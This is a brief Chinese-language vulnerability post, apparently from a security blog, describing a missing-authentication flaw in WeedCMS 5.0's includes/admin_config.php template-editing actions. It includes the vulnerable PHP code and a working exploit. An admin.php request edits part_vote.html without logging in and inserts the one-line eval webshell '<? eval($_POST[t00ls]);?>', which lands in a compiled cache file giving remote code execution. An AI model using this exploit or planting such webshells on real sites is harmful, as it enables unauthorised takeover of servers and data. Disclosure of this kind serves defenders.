野草weedcms 5.0写马漏洞

问题文件在 includes/admin_config.php
这个程序登录验证是一个对每个方法来验证登录 而不是对整个文件来验证
还是那句。。 看代码
if($do==’template_edit’){
        $file=empty($_GET[‘file’])?”:trim($_GET[‘file’]);
        if(get_ext($file)!=’html’&&get_ext($file)!=’css’){
                exit(‘对不起,参数非法!’);
        }
        $content=file_get_contents(‘templates/’.$config[‘site_template’].’/’.$file);
        $smarty=new smarty();smarty_header();
        $smarty->assign(‘file’,$file);
        $smarty->assign(‘content’,$content);
        $smarty->display(‘template_info.htm’);
}

文件开头的方法每个IF后都验证一次 最后2个没有 估计这2个功能是后期加上去 可能当时作者的老人痴呆症发作了…….

EXP: http://127.0.0.1/admin.php?actio … file=part_vote.html
在文件头插入 <? eval($_POST[t00ls]);?>   然后访问一次首页缓存就生成出来了
最后马儿就在 http://127.0.0.1/temps/compile/part_vote.html.php

漏洞提供:

心灵

发表评论?

0 条评论。

发表评论